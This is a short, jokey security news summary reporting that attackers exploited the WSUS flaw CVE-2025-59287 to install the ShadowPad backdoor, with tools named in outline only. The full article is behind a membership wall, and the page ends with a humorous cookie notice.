ShadowPad Attack Strikes Again: Critical Microsoft WSUS Vulnerability Exploited by Hackers

Attackers are exploiting a patched Windows Server flaw, CVE-2025-59287, to distribute ShadowPad malware. This vulnerability, a critical deserialization flaw in WSUS, enables remote code execution. It’s like leaving your front door unlocked, only to find malware has made itself at home, snuggled on your server, munching on your data cookies!

3P
Published: November 24, 2025 8:31 amAdded: November 24, 2025 at 12:51 amAssembled by: The Editor
Pro Dashboard

Hot Take:

When life gives you WSUS vulnerabilities, apparently threat actors make ShadowPad-aid! Microsoft Windows Server Update Services may need a better bouncer at the door since it seems like anyone with a convincing CVE can waltz right in and start serving malware hors d’oeuvres.

Key Points:

  • Threat actors exploited a flaw in WSUS to distribute ShadowPad malware.
  • The attack used CVE-2025-59287, a deserialization vulnerability, for initial access.
  • Tools like PowerCat, curl, and certutil were leveraged for system access and malware installation.
  • ShadowPad, a backdoor favored by Chinese state-sponsored groups, was installed via DLL side-loading.
  • The vulnerability allows remote code execution, posing significant risks.

Membership Required

 You must be a member to access this content.

View Membership Levels
Already a member? Log in here
The Nimble Nerd
powered by the NSA, er,  GDPR Cookie Compliance
Confessional Booth of Our Digital Sins

Okay, deep breath, let's get this over with. In the grand act of digital self-sabotage, we've littered this site with cookies. Yep, we did that. Why? So your highness can have a 'premium' experience or whatever. These traitorous cookies hide in your browser, eagerly waiting to welcome you back like a guilty dog that's just chewed your favorite shoe. And, if that's not enough, they also tattle on which parts of our sad little corner of the web you obsess over. Feels dirty, doesn't it?